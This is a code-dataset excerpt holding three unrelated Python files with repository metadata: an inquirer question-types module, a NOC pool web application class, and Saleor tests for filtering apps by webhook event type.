f00d8a2ff37a2b007fa4edfda74f6d8657793532 | 3,684 | py | Python | piton/lib/inquirer/questions.py | piton-package-manager/PPM | 19015b76184befe1e2daa63189a13b039787868d | [
"MIT"
] | 19 | 2016-04-08T04:00:07.000Z | 2021-11-12T19:36:56.000Z | piton/lib/inquirer/questions.py | LookLikeAPro/PPM | 19015b76184befe1e2daa63189a13b039787868d | [
"MIT"
] | 9 | 2017-01-03T13:39:47.000Z | 2022-01-15T20:38:20.000Z | piton/lib/inquirer/questions.py | LookLikeAPro/PPM | 19015b76184befe1e2daa63189a13b039787868d | [
"MIT"
] | 6 | 2017-04-01T03:38:45.000Z | 2021-05-06T11:25:31.000Z | # -*- coding: utf-8 -*-
"""
Module that implements the questions types
"""
import json
from . import errors
def question_factory(kind, *args, **kwargs):
for clazz in (Text, Password, Confirm, List, Checkbox):
if clazz.kind == kind:
return clazz(*args, **kwargs)
raise errors.UnknownQuestionTypeError()
def load_from_dict(question_dict):
"""
Load one question from a dict.
It requires the keys 'name' and 'kind'.
:return: The Question object with associated data.
:return type: Question
"""
return question_factory(**question_dict)
def load_from_list(question_list):
"""
Load a list of questions from a list of dicts.
It requires the keys 'name' and 'kind' for each dict.
:return: A list of Question objects with associated data.
:return type: List
"""
return [load_from_dict(q) for q in question_list]
def load_from_json(question_json):
"""
Load Questions from a JSON string.
:return: A list of Question objects with associated data if the JSON
contains a list or a Question if the JSON contains a dict.
:return type: List or Dict
"""
data = json.loads(question_json)
if isinstance(data, list):
return load_from_list(data)
if isinstance(data, dict):
return load_from_dict(data)
raise TypeError(
'Json contained a %s variable when a dict or list was expected',
type(data))
class TaggedValue(object):
def __init__(self, label, value):
self.label = label
self.value = value
def __str__(self):
return self.label
def __repr__(self):
return self.value
def __cmp__(self, other):
if isinstance(other, TaggedValue):
return self.value != other.value
return self.value != other
class Question(object):
kind = 'base question'
def __init__(self,
name,
message='',
choices=None,
default=None,
ignore=False,
validate=True):
self.name = name
self._message = message
self._choices = choices or []
self._default = default
self._ignore = ignore
self._validate = validate
self.answers = {}
@property
def ignore(self):
return bool(self._solve(self._ignore))
@property
def message(self):
return self._solve(self._message)
@property
def default(self):
return self._solve(self._default)
@property
def choices_generator(self):
for choice in self._solve(self._choices):
yield (
TaggedValue(*choice)
if isinstance(choice, tuple) and len(choice) == 2
else choice
)
@property
def choices(self):
return list(self.choices_generator)
def validate(self, current):
try:
if self._solve(self._validate, current):
return
except Exception:
pass
raise errors.ValidationError(current)
def _solve(self, prop, *args, **kwargs):
if callable(prop):
return prop(self.answers, *args, **kwargs)
if isinstance(prop, str):
return prop.format(**self.answers)
return prop
class Text(Question):
kind = 'text'
class Password(Question):
kind = 'password'
class Confirm(Question):
kind = 'confirm'
def __init__(self, name, default=False, **kwargs):
super(Confirm, self).__init__(name, default=default, **kwargs)
class List(Question):
kind = 'list'
class Checkbox(Question):
kind = 'checkbox'
| 24.236842 | 72 | 0.604777 | 431 | 3,684 | 5.016241 | 0.236659 | 0.022202 | 0.030065 | 0.015726 | 0.123959 | 0.068455 | 0.068455 | 0.042553 | 0.042553 | 0 | 0 | 0.000774 | 0.29886 | 3,684 | 151 | 73 | 24.397351 | 0.836237 | 0.159338 | 0 | 0.053763 | 0 | 0 | 0.034907 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.182796 | false | 0.043011 | 0.021505 | 0.064516 | 0.526882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
f0123837d9cb8c6159b0ec92e3dc57d8e6054cf3 | 704 | py | Python | services/web/apps/main/pool/views.py | xUndero/noc | 9fb34627721149fcf7064860bd63887e38849131 | [
"BSD-3-Clause"
] | 1 | 2019-09-20T09:36:48.000Z | 2019-09-20T09:36:48.000Z | services/web/apps/main/pool/views.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | services/web/apps/main/pool/views.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# main.pool application
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# NOC modules
from noc.lib.app.extdocapplication import ExtDocApplication
from noc.main.models.pool import Pool
from noc.core.translation import ugettext as _
class PoolApplication(ExtDocApplication):
"""
Pool application
"""
title = _("Pool")
menu = [_("Setup"), _("Pools")]
model = Pool
glyph = "database"
default_ordering = ["name"]
| 28.16 | 71 | 0.473011 | 57 | 704 | 5.754386 | 0.701754 | 0.064024 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014925 | 0.143466 | 704 | 24 | 72 | 29.333333 | 0.529022 | 0.492898 | 0 | 0 | 0 | 0 | 0.077844 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
f013b73782802e7be9ad94ff6ab1e1a0a57d6410 | 1,224 | py | Python | saleor/app/tests/test_models.py | fairhopeweb/saleor | 9ac6c22652d46ba65a5b894da5f1ba5bec48c019 | [
"CC-BY-4.0"
] | 15,337 | 2015-01-12T02:11:52.000Z | 2021-10-05T19:19:29.000Z | saleor/app/tests/test_models.py | fairhopeweb/saleor | 9ac6c22652d46ba65a5b894da5f1ba5bec48c019 | [
"CC-BY-4.0"
] | 7,486 | 2015-02-11T10:52:13.000Z | 2021-10-06T09:37:15.000Z | saleor/app/tests/test_models.py | aminziadna/saleor | 2e78fb5bcf8b83a6278af02551a104cfa555a1fb | [
"CC-BY-4.0"
] | 5,864 | 2015-01-16T14:52:54.000Z | 2021-10-05T23:01:15.000Z | from ...app.models import App
from ...webhook.event_types import WebhookEventType
def test_qs_for_event_type(payment_app):
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 1
assert qs[0] == payment_app
def test_qs_for_event_type_no_payment_permissions(payment_app):
payment_app.permissions.first().delete()
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 0
def test_qs_for_event_type_inactive_app(payment_app):
payment_app.is_active = False
payment_app.save()
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 0
def test_qs_for_event_type_no_webhook_event(payment_app):
webhook = payment_app.webhooks.first()
event = webhook.events.filter(event_type=WebhookEventType.PAYMENT_AUTHORIZE).first()
event.delete()
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 0
def test_qs_for_event_type_inactive_webhook(payment_app):
webhook = payment_app.webhooks.first()
webhook.is_active = False
webhook.save()
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 0
| 32.210526 | 88 | 0.768791 | 172 | 1,224 | 5.116279 | 0.186047 | 0.1125 | 0.136364 | 0.218182 | 0.6875 | 0.640909 | 0.617045 | 0.497727 | 0.497727 | 0.497727 | 0 | 0.005671 | 0.135621 | 1,224 | 37 | 89 | 33.081081 | 0.826087 | 0 | 0 | 0.407407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0.185185 | false | 0 | 0.074074 | 0 | 0.259259 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.